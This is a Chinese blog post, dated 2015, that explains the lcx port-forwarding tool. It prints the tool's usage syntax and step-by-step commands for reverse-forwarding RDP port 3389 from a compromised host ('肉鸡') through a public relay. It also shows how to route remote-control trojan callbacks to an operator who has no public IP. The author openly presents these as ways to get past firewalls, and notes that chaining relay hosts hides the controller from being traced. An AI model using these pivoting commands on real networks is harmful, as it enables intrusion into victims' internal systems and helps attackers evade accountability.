端口转发工具lcx使用两类

  lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路(如图1)。它常用于外网连接内网3389端口。

  这个工具很早就已经有了,它的全名叫Socket data transport tool,简写做trtool,由红盟联盟的前辈bkbll所写,功能和lion写的htran 1.1版一样,不过是在linux下使用的而已。所谓的lcx.exe其实是lcx根据lion的代码所修改编译过的htran。现在已经有跨平台的了,支持在windows、linux下使用。还有一些根据lcx源码开发的其他版本,比如jsp版,http隧道版等等。

  

  下面说一下它的使用以及功能说明:

Usage of Packet Transmit:
  ./lcx -<listen|tran|slave> <option> [<-log|-hex|-text> file] 
  ./lcx -about

[options:]
  -listen <local port1>  <local port2>
  -tran   <local port>   <remote host>  <remote port>
  -slave  <remote host1> <remote port1> <remote host2> <remote port2>

  -hex   : hex mode data dump
  -text  : text mode data dump
  -log   : save transfer log

  最常用功能:连接内网的3389

  1. B主机(公网IP:20.30.40.50): lcx -listen 2222 6666

  2222为转发端口,6666为B主机任意未被占用的端口

  2. A肉鸡服务器:lcx.exe -slave 20.30.40.50 2222 127.0.0.1 3389

  20.30.40.50为B主机的IP,2222为转发端口,127.0.0.1为A肉鸡内网IP,3389为远程终端端口

  3. B主机连接A肉鸡3389时格式:mstsc 127.0.0.1:6666

   当然,其他主机(C主机,可以在内网中)连接A肉鸡服务器:mstsc 20.30.40.50:6666

  至此,就可以通过lcx端口映射就可以直接连接内网服务器了。整个连接流程图大致如下:

  上面的情况中多数是通过跳板主机B来连接肉鸡服务器的,也就是主机C通过连接处于公网中的服务器B来连接内网服务器A。上面的连接中,先是肉鸡服务器主动发起向外(主机B)的连接,所以这种情况,防火墙一般是不会拦截的。而且由于跳板机(主机B)只是监听本地端口,而控制者(主机C)可以在任意网络环境中,所以很难追踪到控制者的具体位置。如果再加上几个跳板就很难被查水表啦:)

 

  逆向思维:端口转发实现远程控制

  基于lcx强大的端口转发功能,可以通过端口转发实现将远程控制的服务端放置的任意网络环境中。  

  1. 配置客户端上线地址:21.23.10.8 端口:8083

  2. 公网主机运行lcx:lcx -listen 123 8083

  3. 控制端运行:lcx.exe -slave 21.23.10.8 123 127.0.0.1 789  通知设置远控控制端的监听端口:789  

  可以看到,这用使用方式和上面的完全相反。控制端使用lcx主动连接公网中的转发主机,由于肉鸡上的客户端默认是配置主动连接的,所以只要转发通道是通畅的,客户端发起的连接都会由转发主机转发到控制端的机子上,而无论控制端是否有公网IP。所以说,关键的瓶颈就可以这用解决。又由于lcx已经支持跨平台,所以即使公网主机是Linux系统也可以实现只能在windows上跑的绝大多数远控软件。

    关于lcx的使用就简单介绍到这里,之后将会对lcx源码做一个简单的分析,博客将持续更新。。。

 

posted @ 2015-05-15 21:30  lingerhk  阅读(14882)  评论(1编辑  收藏  举报
So long as men can breathe or eyes can see,So long lives this and this gives to thee.